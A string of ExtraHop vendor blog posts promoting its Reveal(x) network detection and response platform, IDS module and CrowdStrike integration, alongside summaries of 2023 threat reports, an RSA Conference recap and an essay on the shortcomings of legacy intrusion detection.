As part of the 9.3 release of the Reveal(x) network detection and response (NDR) module, ExtraHop customers can now use a native integration with CrowdStrike Falcon® LogScale to integrate NDR telemetry with their XDR data. This enhanced functionality allows joint customers to send network logs from ExtraHop for long-term storage and analysis in Falcon LogScale to achieve broader, deeper visibility when identifying and responding to threats.

Get Even More Value from Reveal(x) NDR

ExtraHop empowers security analysts to act fast with the right tools and the features most useful to their role. The NDR module offers users a more streamlined experience with personalized dashboards and customized workflows to improve analysts’ productivity. The modularization also allows customers to easily add additional components—for IDS or packet forensics, for example—to their Reveal(x) deployment as their needs change.

With the 9.3 release, Reveal(x) NDR has expanded its detector coverage for lateral movement and post-compromise techniques. In addition, Reveal(x) NDR now features customizable enrichment links that make it easier for analysts to access even more threat intelligence from providers such as CrowdStrike Recorded Future, and CMDB. The NDR module also features new threat briefings that monitor for employee misuse of generative AI tools, MOVEit vulnerabilities, and other issues.

Integrations continue to play a key factor in maximizing customization. The Reveal(x) NDR module offers improved detection filtering, with SIEM and SOAR integrations, to reduce SOC alert noise. Meanwhile, Windows Agent Updates allow for a smoother installation and greater ability to run EDR agents alongside Reveal(x) sensors.

CrowdStrike LogScale is Now Native to Reveal(x)

Reveal(x) 9.3 also includes a newly-built native integration with the CrowdStrike Falcon LogScale observability and log management solution. This functionality will help customers using both Reveal(x) and Falcon integrate rich network telemetry with other security logs, increasing accuracy and reliability for threat hunters and analysts. The out-of-the-box integration gives customers a quick, simple way to gain visibility across the network and enrich SOC workflows.

With Reveal(x) NDR and Falcon Insight XDR, joint customers can continuously inventory all managed and unmanaged devices, rapidly detect attack behaviors, correlate available threat intelligence, and automatically quarantine impacted devices to stop breaches in progress.

The native integration brings together the power of two industry-leading cybersecurity solutions. CrowdStrike was named a Leader for the third consecutive time in the December 2022 Gartner® Magic Quadrant™ for Endpoint Protection Platforms. In June, ExtraHop was named a Leader in the inaugural Forrester Wave™: Network Analysis and Visibility, Q2 2023, earning the highest possible scores in 20 out of 29 criteria.

Gartner, Magic Quadrant for Endpoint Protection Platforms, Peter Firstbrook, Chris Silva, 31 December 2022.

Gartner is a registered trademark and service mark and Magic Quadrant is a registered trademark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved. This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from CrowdStrike. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Take a next-gen approach to securing sensitive information

By the end of government fiscal year 2024, all U.S. civilian government agencies must adopt CISA’s Zero Trust Maturity Model as a part of White House directive M-22-09. To help agencies meet this directive, ExtraHop released a new IDS module for Reveal(x), its network detection and response platform. ExtraHop IDS is designed to address the unique security requirements of U.S. government agencies and support a zero trust security architecture.

Verify and Manage Information Access

Due to the sensitive nature of government data, agencies have historically opted for on-premises solutions. In recent years, however, these agencies have been pushed to prioritize and adopt cloud-based solutions. As a result, many agencies still deploy sensors that have limited cloud access or are disconnected entirely, which makes it harder for security analysts to manage and update them with rules for detecting new malware.

Agencies are also moving toward more decentralized environments, where employees and contractors can access information that may originate from outside traditional federal agency perimeters. While legacy intrusion prevention systems (IPS) have had their place in defending against certain attacks, it only takes one breach to cause major damage.

These factors increase agencies’ attack surfaces and complicate their ability to maintain a strong security posture. ExtraHop IDS provides government customers with expanded detection coverage of known threats so analysts can see every device, user, and asset on the network. With the 9.3 release of Reveal(x), our new modules come with specific role-based data access controls—NDR, NPM, IDS, and Packet Forensics.

Our flexible deployment options include both virtual and physical on-premises sensors for agencies with restricted cloud access or isolated networks. The physical sensors also come preloaded with tens of thousands of curated rules from trusted sources including the ETPro ruleset and are updated daily. The ExtraHop REST API can be configured to upload resources to disconnected sensors, providing additional support to government agencies with restricted cloud access.

How ExtraHop IDS Accelerates Zero Trust

An essential tenet of zero trust is the ability to inspect and analyze logged network traffic at the packet level. As attack surfaces continue to expand, leaning on IPS to prevent attacks will not be enough. Organizations need to be able to analyze both north-south and east-west network traffic at scale. Traditional IDS solutions have limited decryption capabilities and can miss critical detections. These products also struggle to identify new and evolving threats because they must maintain, review and manually update signature rulesets.

ExtraHop IDS can accelerate zero trust adoption by harnessing network data and tens of thousands of high-fidelity network signatures. Analysts can validate policy enforcement by monitoring and safeguarding network traffic—both east-west and north-south traffic—with enhanced decryption capabilities.

Along with network data, government agencies need the ability to search for and identify connections that might have malicious intent. By deploying ExtraHop IDS, analysts gain complete coverage for known malware, command-and-control communications, botnets, communication with drive-by sites, and other advanced threats. When new vulnerabilities emerge, analysts can update rules within minutes of being published through the API workflow.

An integrated approach with IDS as part of the Reveal(x) NDR platform provides deeper coverage and a seamless experience for civilian government agencies to implement zero trust initiatives faster and better defend IT environments from future attacks.

The latest release of Reveal(x) also includes native integration with the CrowdStrike Falcon LogScale observability and log management solution. Customers using both Reveal(x) and Falcon can respond quicker to advanced threats with enhanced precision.

ExtraHop was also named a Leader in the inaugural Forrester Wave™: Network Analysis and Visibility, Q2 2023. According to the report, ExtraHop has the largest market presence among the leaders.

Cloud environments are critical to an organization’s ability to innovate—which also makes them a prime target for a new class of cyberattackers: the cloud-conscious adversary.

In their 2023 Cloud Risk Report, CrowdStrike covers the tactics, techniques and procedures (TTPs) employed by these threat actors and how prolific they’ve become in their pursuit of information and financial gain.

Attackers are Exploiting Trusted Identities

The report highlights some staggering statistics: a 95-percent increase in cloud exploitation and a 288-percent increase in cloud-capable actors year over year. Breakout time—the time it takes an attacker to exfiltrate data after gaining an initial foothold—averaged 84 minutes, which is shorter than the previous year. This speed indicates these adversaries are getting more confident at infiltrating and operating in the cloud.

Cloud entitlements and permissions are notoriously complex, and it's not uncommon for services like AWS to have thousands of different access controls. CrowdStrike notes these authenticated credentials play heavily in these incidents, and adversaries have been stealing permissions or initializing brute force password attacks. Once inside, they move laterally through the cloud, evading defenses and requesting credentials to escalate privileges for greater access. Of the cloud incidents observed, CrowdStrike saw that 67 percent of identity and access management (IAM) roles were "over-privileged", or escalated beyond their requirements.

Container Security Remains Tricky

Container workloads continue to grow in popularity for their smaller footprint relative to virtual machines (VMs) and their ease of deployment across multiple architectures. Unfortunately, the ephemeral nature of containers make them difficult to secure. It's common for containers to be spun up, run, then spun down in a matter of minutes, making them even more difficult to discover. Furthermore, the layered nature of IaaS, PaaS, and Serverless infrastructure increase the chances of blindspots or misconfigurations. CrowdStrike reports that 60 percent of observed container workloads lack properly configured protections.

Even when there is security in place, teams often lack visibility in these environments. Adversaries are able to access containers through external-facing services, such as APIs or SSH. Once inside, they can hide within existing containers—or create their own—to avoid defenses, which gives them time to introduce malicious code into the environment. The report also notes that incident response teams only get a partial view of container incidents, which means that compromised workloads are often missed.

Protect Cloud Workloads with Continuous Network Visibility

Cloud-conscious adversaries pose significant risk, but even the most sophisticated attackers leave a trail. Our strategic partnership with CrowdStrike combines Reveal(x) 360 network intelligence with Falcon endpoint data and threat intelligence for full-coverage detection, investigation, and response capabilities. Reveal(x) 360 lights up the east-west corridor and discovers post-compromise behaviors like lateral movement to help keep your cloud secure.

Reveal(x) 360 also unifies security across containerized environments and orchestration services with AI-powered peer group analysis to detect advanced threats as they occur in highly dynamic environments. Analysts can identify when threat actors may be using compromised credentials to access and use assets with malicious intent and stop them in their tracks—before they can reach the cloud.

If threat actors had a motto, it would be, "If it ain’t broke, don’t fix it.”

The Verizon 2023 Data Breach Investigation Report (DBIR) shows us that if a threat actor finds an attack method that works, they’re going to use it over and over.

Attackers Do it for the Money

Verizon classifies incidents into patterns, such as denial of service (DoS), basic web application attacks, social engineering, and system intrusion. These four patterns account for the majority of incidents and breaches, while miscellaneous errors and stolen assets are less common. System intrusion accounted for roughly 40 percent of all breaches, and 80 percent of these intrusions involved ransomware.

Unsurprisingly, 95 percent of all reported attacks were perpetrated for financial gain. Verizon also notes that 24 percent of attacks were considered ransomware. That number is consistent with the previous year, which the report labels as statistically stable. If an organization encounters a breach, one in four times it will be to hold something valuable for a hefty payout.

Social Engineering is on the Rise

Stolen credentials remained the most widely used method to gain access, representing nearly 49 percent of all reported breaches. To harvest credentials, attackers often rely on social engineering techniques, including phishing and pretexting.

Pretexting is most commonly used in business email compromise (BEC), and the frequency of these attacks nearly doubled year over year. Attackers—often imitating a CEO or high-ranking manager—employ different techniques to convince a victim to disclose sensitive data. For example, they typically apply a sense of urgency, or they may falsify authentic documents (like a petition or questionnaire) or hijack existing communications between an employee and a manager. If they don’t get what they want, they will quickly escalate the situation and threaten the targeted employee.

These attacks are extremely popular for a reason—they work. Verizon states that the median amount stolen through social engineering is now $50,000.

If it’s an Exploit, it’s Probably Log4j

It was surprising to see vulnerabilities only accounted for five percent of all reported incidents. Of these attacks, a whopping 90 percent involved Log4j. This exploit was first announced in December 2021.

Verizon reports that over 32 percent of all Log4j scanning activity occurred in the first 30 days of its discovery, and the biggest spike in scanning activity hit within the first 17 days. Thanks to a quick patch response by the industry, many organizations were able to mitigate what could have been a major disaster. The report also notes that only about 20 percent of the organizations that contributed data to the 2023 Verizon Data Breach Investigations Report offered to name the specific exploit they encountered, so the fact that 90 percent of contributors referenced log4j points to the vulnerability’s wide distribution.

The Network as the Definitive Source of Cybertruth

What the attack patterns and techniques covered in the Verizon Data Breach Investigations Report have in common is that they are all network detectable with Reveal(x). Reveal(x) performs continuous packet capture, stream reassembly, full protocol parsing, and decryption of all network traffic in the east-west corridor to provide organizations with 360-degree visibility into user and device activity across their network and to detect lateral movement, privilege escalation, and other post-compromise attack techniques.

Reveal(x) also automatically discovers and identifies all assets communicating across a network—whether they’re managed or unmanaged—as well as the protocols and ports they use to communicate. In addition, it leverages machine learning to baseline normal network behavior and detect deviations from it. By combining machine learning with real-time asset discovery, Reveal(x) can identify when threat actors may be using compromised credentials to access and use assets with malicious intent.

When you have complete visibility, patterns become easier to detect. No matter how inventive an attacker may become, they can’t outsmart the network.

Security leaders are constantly under pressure to demonstrate the value and impact of their cybersecurity programs and security technology investments. That pressure is even greater in times of economic uncertainty.

During a recent ExtraHop webinar titled Demonstrating the Value of Cybersecurity, Roland Cloutier, a global CSO and Digital Business Enablement Executive, shared methodologies and strategies he’s used to promote the value of cybersecurity over the course of his career. Roland has worked for TikTok, ADP, EMC, the U.S. Department of Defense, and the Department of Veterans Affairs.

Roland also introduced the concept of business operations protection and walked through what it takes to be a successful business and technical partner to the C-suite.

The First Principles of Business Operations Protection

You can’t protect what you don’t understand. It’s critical to know how the business goes to market, the products they make, their margins, the competitive landscape—and everything in between. That way, you have a stronger understanding of what needs to be protected.

Have principled priorities through Value at Risk. Once you understand what parts of the business hold more weight, such as the supply chain or manufacturing, you can make more informed decisions on where security needs to be implemented or improved.

Drive business through market trust enablement. Now that you’ve aligned the business’s goals and how it operates to create an effective security strategy, you can build trust—both from within the organization and the greater industry—to grow and deliver a greater ROI. Established companies with a trusted security posture are going to drive customers to partner with them.

Being a Successful Business Partner

To build an effective cybersecurity or business operations protection program, Roland maintained that security leaders need to start “by being a better business partner.” He defined this practice from a business perspective and a financial perspective.

On the business side, Roland noted that security executives still need to “run the business like a business” while maintaining organizational efficiency and metrics. He recommended that CSOs and CISOs define achievable cybersecurity capabilities within the company and be transparent about limitations preventing them from providing certain services. This clarity on priorities allows security leaders to set consistent expectations and build trust with both board members and customers. “Happy customers are repeat customers,” Roland reminded viewers.

From the financial perspective, Roland stressed the importance of thinking like a business owner. While growth is almost always top of mind, it may not always be the most important goal. At any given moment, the economy or industry may demand a different approach. When thinking about your company’s goals, Roland recommended asking yourself these questions:

• Are we taking the right financial steps?

• How are we doing service cost analysis on the offerings we’re delivering?

Being finance-focused shows other executives and board members a level of accountability and responsibility that they can get behind and support. “It’s all about risk versus reward,” Roland said. “Being cognisant of what the organization is going through and making intelligent and risk-based decisions is critical.”

Watch the webinar recording to learn more about Roland’s philosophy on business operations protection and how to establish a greater ROI in your organization’s cyber defense strategy.

In its 2023 M-Trends Special Report, Mandiant is calling 2022 “the year of the aggressive threat actor.” The incident response company observed a willingness among adversaries to do whatever it took to achieve their objectives, which weren’t always financially motivated. They employed bullying tactics, impersonated employees, and were relentless in their use of phishing. But defenders claimed some victories, too.

Dwell Time is Down, Data Theft is Up

One success metric that defenders witnessed last year included a drop in attackers’ global median dwell time, from 21 days in 2021 to 16 in 2022. This overall improvement in detection “reflects a growing recognition of the critical role partnerships and information exchange play in building a resilient cybersecurity ecosystem,” Mandiant notes. However, dwell time involving ransomware increased from five days to nine days, which means adversaries were able to go undetected for longer periods of time, often because they employed “living off the land” techniques where they leverage their victim’s native tools, applications, and protocols to evade security controls and detection.

Another interesting statistic highlights a small drop in a common motivation for attacks: The proportion of adversaries seeking financial gain decreased from 30 percent to 26 percent in 2022. However, data theft increased from 29 percent to 40 percent, which implies threat actors are stealing information for other purposes rather than holding the data for ransom.

Targeted Attacks and Industries

Cyber espionage proved highly prevalent in 2022, with 25 percent of attacks targeting government bodies—a sharp jump from 9 percent the previous year. The primary reason for this increase comes from the Russian invasion of Ukraine, Mandiant points out. Several countries contributed to intrusions and to intelligence gathering efforts while a volunteer cyber army came to Ukraine’s aid to defend and perform counter reconnaissance.

Professional businesses and financial institutions followed governments in most attacks that Mandiant documented, at 14 percent and 12 percent, respectively. These numbers remain consistent with the previous year. As Mandiant reports, “These industries remain attractive targets for both financially and espionage motivated actors.”

Attack Vectors and Infiltration Techniques

Exploits remained the most common infection vector, comprising 32 percent of globally identified attacks, followed by phishing and stolen credentials. Of these exploits, the Log4j vulnerability (CVE-2021-44228) was identified most frequently, followed by F5 Big-IP iControl REST (CVE-2022-1388) and VMware Workspace ONE Access and Identity Manager (CVE-2022-22954). Each threat was notable for its ease of exploitation, and even after being patched, these threats managed to cause considerable damage. (It’s worth noting that ExtraHop Reveal(x) provides detections for these and other vulnerabilities.)

Mandiant continued to see BEACON malware represented as the most recognized malware in investigations at 15 percent in 2022, down from 28 percent in 2021. These backdoor attacks often utilize the Cobalt Strike platform. LockBit and Basta malware each accounted for 2 percent of all attacks. An interesting omission was SUNBURST, which was responsible for nine percent of malware investigations in 2021 but didn’t make this year’s list.

Threat Actors are Breaking the Rules

While financial gain has dropped in motivation over the past few years, it’s still the primary focus for 48 percent of threat groups, Mandiant notes. The other motivations appear to be infiltrating and causing havoc for the mere sake of bragging rights. Phishing attacks rose significantly, from 12 percent in 2021 to 22 percent of all attacks last year. Mandiant points to a new method beyond email scams: attackers creating cloud-based call centers to impersonate employees and steal credentials, known as voice phishing, or “vishing.”

“We’re seeing attackers cause bigger impacts with less skills,” the report says. “They’re also more brazen, and willing to get much more aggressive and personal to achieve their goals. They will bully and threaten, and ignore the traditional cyber rules of engagement. It’s not enough to just protect systems these days, employees need to be protected as well.”

Cyber hygiene isn’t enough to stop this new era of aggressive cyber attackers, the report concludes. Companies, municipalities, financial institutions—any organization with sensitive data—should implement a zero trust security mindset. Even as cybersecurity measures improve, adversaries have repeatedly shown they will find a way to gain access.

This year’s RSA Conference proved to be a huge success. The Moscone Center in San Francisco hosted nearly 50,000 cybersecurity professionals over four days of presentations, speaking sessions, and booth demonstrations. ExtraHop experts who were on site noted a strong sense of curiosity and excitement as they spoke with attendees on the expo floor. The conference marked a return to relative normalcy and offered a much-needed break from the virtual office.

Here are a few highlights:

The Black Box Experience

This year, ExtraHop revealed a mysterious and exciting new experience at the booth. Along with a big announcement of new features and integrations, attendees had the opportunity to enter the Black Box—a giant cube with an immersive representation of what is happening in the network.

The response from the floor was very positive, with many praising the concept and visuals. Its size drew a high volume of customer and partner engagement.

Partnering with CrowdStrike

Aside from the Black Box, the ExtraHop booth was abuzz with people attending daily co-sponsored chats with our integration partner, CrowdStrike. Experts from both companies discussed the complementary role network detection and response (NDR) and endpoint detection and response (EDR) play in helping companies mitigate cyber risk. For some, these conversations were the entry point to learn more about how NDR fills gaps in security—from monitoring IoT devices to detecting suspicious network behavior.

We also co-hosted a threat hunting challenge, which allowed participants to get a hands-on experience of how ExtraHop Reveal(x) detects and stops threats in the network. It was a popular event that awarded top scores daily and a grand prize at the end of the week.

Jeff Costlow’s Speaking Session

Jeff Costlow, Deputy CISO at ExtraHop, presented his session Semi-Advanced Threats vs. The Semi-Critical Infrastructure. He discussed the rise of a new type of threat actor that’s emerging from the dismantling of state-sponsored groups. The targets of this new type of threat actor include local food suppliers, public transportation services, and other sectors of what Costlow calls “semi-critical infrastructure.” He explained why these actors are targeting this sector, the economic ramifications, and advice for combatting this threat.

NDR is Gaining Momentum

NDR may not yet have the recognition that EDR and SIEM have among security professionals, but awareness was clearly growing at this year’s RSA Conference, judging by the crowds coming to the ExtraHop booth. Attendees who stopped by to explore the Black Box, participate in a hunter challenge, or listen to a lightning talk from ExtraHop and CrowdStrike walked away with a much greater appreciation for the unique role that the network plays in threat detection and response.

If you weren’t able to attend RSA Conference, check out our demo to see for yourself—and we’ll see you at the next big event!

ExtraHop today announced the next evolution of intrusion detection technology with ExtraHop IDS. This new solution, combined with the Reveal(x) network detection and response (NDR) platform, provides companies with expanded detection coverage through tens of thousands of reputable network signatures.

When deployed with Reveal(x) or Reveal(x) 360, ExtraHop IDS provides security teams with high-fidelity, real-time detection of known and unknown malware and exploits, including detection of known threats hiding in encrypted network traffic. It also facilitates advanced triage and investigation through risk scoring and correlation capabilities, as well as native and turn-key integrations with CrowdStrike, Splunk, and other leading security providers.

The Problem ExtraHop IDS Solves

Many organizations are finding that the legacy IDS tools they deployed to meet regulatory compliance and cyber insurance requirements don’t provide quality alerts: they produce numerous alerts, but with little to no context for investigation and response, and even as an increasing number of threats slip past them. Moreover, most IDS solutions can’t detect threats in encrypted network traffic, which creates a huge blindspot for organizations at a time when roughly 85% of network traffic is encrypted. This blindspot puts internet-facing assets like email and web servers at greater risk for being exploited as an entry point for bad actors.

While IDS was designed to detect and secure the network perimeter from attacks like port scanning, SQL injections, and buffer overflows, new adversary tactics, techniques and procedures have exposed the limitations of IDS tools. As attackers have become more strategic and malicious, organizations need to pivot to a comprehensive defense solution.

ExtraHop IDS Capabilities and Benefits

ExtraHop IDS offers critical capabilities to streamline workflows and more effectively stop threats:

• Automated, high-fidelity signature-based detections curated by the ExtraHop Threat Research team, based on feedback from thousands of real-world networks.

• Rapid CVE detection with tens of thousands of signatures from reputable sources such as the Emerging Threats Pro (ET Pro) rule set.

• Automated cloud updates to sensors within minutes of rules being published.

• Integrated security technologies to reduce overhead, simplify management, and improve response time.

• Out-of-band sensor eliminates the impact on network performance.

The combination of Reveal(x) with ExtraHop IDS allows customers to deploy and manage their cloud-enabled IDS sensors from the same console as their NDR sensors, which helps to streamline detection, investigation and response, and gives security leaders the opportunity to consolidate security technologies without compromising functionality. Customers also gain unrivaled network-based detection logic to identify malware command and control communications, known bad landing pages, botnets, communication with drive-by download sites, and other advanced threats. Our comprehensive rule set includes:

• Major malware families covered by command and control channel and protocol.

• Detection across all network-based threat vectors, from SCADA protocols and web servers to the latest client-side attacks served by exploit kits.

• The most accurate malware call-back, dropper, command-and-control, obfuscation, exploit kit related, and exfiltration signatures the industry can offer.

• Coverage for in-the-wild CVE vulnerabilities, including Microsoft MAPP and Patch Tuesday updates.

CISOs and security teams can no longer support operationally intensive technologies like legacy IDS. They need a more comprehensive security posture that can unmask modern adversaries, reduce dwell time, improve operational efficiencies, and support compliance requirements. To learn more about ExtraHop IDS and how it can take your network security to the next level, read the solution brief.

Today’s threat landscape demands a lot from security analysts: unwavering attention, unflagging energy, and an uncanny ability to hunt for unknown threats on an organization’s network.

In a recent video, ExtraHop expert Josh Snow explains step by step how to proactively hunt for threats with Reveal(x). He begins by detailing the three key components:

• Coverage. This includes data sources (logs, agents, network data), encrypted traffic, communication between devices and the network, and the correlation between these disparate streams.

• Workflow. How easily are you able to access proprietary telemetry data to make correlated context-driven insights, and be able to search across large amounts of this data?

• Retention. The ability to look back through historic organizational data to uncover and contain dormant threats.

These steps provide analysts with a rich data source and the broad spectrum coverage required to hunt for advanced threats—which is how members of the ExtraHop Detections Research and Data Science teams successfully detected and contained a Cobalt Strike attack on an organization's network environment.

Watch the video for a comprehensive guide to threat hunting with Reveal(x).

Intrusion detection systems (IDS) gained popularity in the 1990s to address weaknesses in computer software. Their detection strategy relies on signatures, which attempt to identify traffic patterns associated with known exploits of documented software vulnerabilities. When IDS detects a known exploit, it sends an alert to the security operations center (SOC) so analysts can investigate its severity.

In the early 2000s, IDS was considered the “source of truth” for the network—so much so that intrusion detection technology became a compliance requirement for the Payment Card Industry Data Security Standard (PCI DSS). Many cyber insurance issuers also require some form of IDS for coverage.

Over the roughly 25 years that IDS solutions have been a part of the security technology landscape, organizations relying on them have grown disillusioned with the technology. They’ve witnessed different attacks sneak past their IDS time and again.

As other security technologies have advanced, many IDS solutions lack the ability to learn. They only know the signatures and exploits included as part of their detection methodology. The threat landscape has evolved so much that decades-old signature detection only tells at best part of the story.

Machine Learning Strengthens Defense

From the beginning of IDS, searching for patterns, tracking behavior, and finding anomalies were required for full-spectrum detection (NIST 800-94). IDS developers understood early patterns, but detecting new behaviors and anomalies proved difficult to achieve in dynamic environments using manual analysis techniques.

Today, machine learning (ML) has become the foundation for delivering what is sorely lacking in threat detection and response solutions: behavioral, anomaly, peer group, and rules-based pattern detections. Machine learning is critically important because it allows the technology to detect both known and unknown attacker tactics, techniques, and procedures (TTP). Sophisticated threat actors will continuously find new and inventive ways to gain access to the network, and standalone IDS without network data has demonstrated it can’t keep up with both known and unknown threats.

Encrypted Data and an Expanding Perimeter

IDS was developed when most network traffic was delivered in cleartext. Today, encryption is the most common tactic for securing data. For example, 95% of Google traffic is encrypted. As a result, IDS is blind to much of the important, the mundane, and the dangerous traffic crossing the perimeter or moving laterally through data centers and cloud infrastructure.

The perimeter surrounding the network also continues to expand, with unmanaged devices and cloud workloads crossing boundaries without any observable security state. These devices can become infected outside of a security team's purview or through alternative communication channels, such as third-party VPN, mobile side channels, or trusted peering networks. These advanced methods are unobservable by outward-facing IDS.

Attacks are More Advanced

Software vulnerabilities were the primary threat consideration when designing IDS, and CVEs continue to be an important security concern. However, attackers now prefer advanced exploitation methods—through social engineering schemes, use of stolen credentials, or human error (misconfigurations)—finding these tactics more effective than swimming in assembly code to develop or buy expensive zero-day exploits.

The defender’s dilemma states that modern attackers only have to get it right once, whereas defenders have to get it right every time to prevent a breach at the perimeter. IDS lacks the defense-in-depth detection backup against attackers sneaking past legacy prevention defenses as they land and pivot toward valuable data.

Alert Fatigue

Legacy IDS inspects traffic as it passes by, looking for a pattern that matches a signature in its library. When it detects a match, IDS triggers an alert. Unfortunately, most IDS stops at alerts, leaving time-strapped analysts to search for root cause with other investigation tools and, in some cases, access another PCAP repository tool for forensic evidence.

These alerts have grown cumbersome for many SOC analysts. The more anomalies get detected, the more alerts are triggered. With a limited set of known detections, unknown signals will repeatedly sound the alarm, which can overwhelm analysts and increase the mean time to resolution.

The Next Evolution of IDS

There have been great improvements in cybersecurity, such as endpoint detection and response (EDR) and security information and event management (SIEM) solutions. However, these technologies still lack the broad visibility needed to improve the quality of alerts and eliminate blindspots.

One solution that can improve IDS functionality is network detection and response (NDR). NDR monitors both north-south and east-west traffic for malicious activity and policy violations. It also utilizes full-spectrum detection powered by ML behavioral analysis and high-risk CVE exploit identification, and combines those capabilities with streamlined incident response workflows.

When SOC analysts can see more, they know more clearly how to stop advanced threats. IDS is long overdue for an upgrade, and the next evolution should include key NDR capabilities to bolster a stronger security posture and maintain compliance requirements.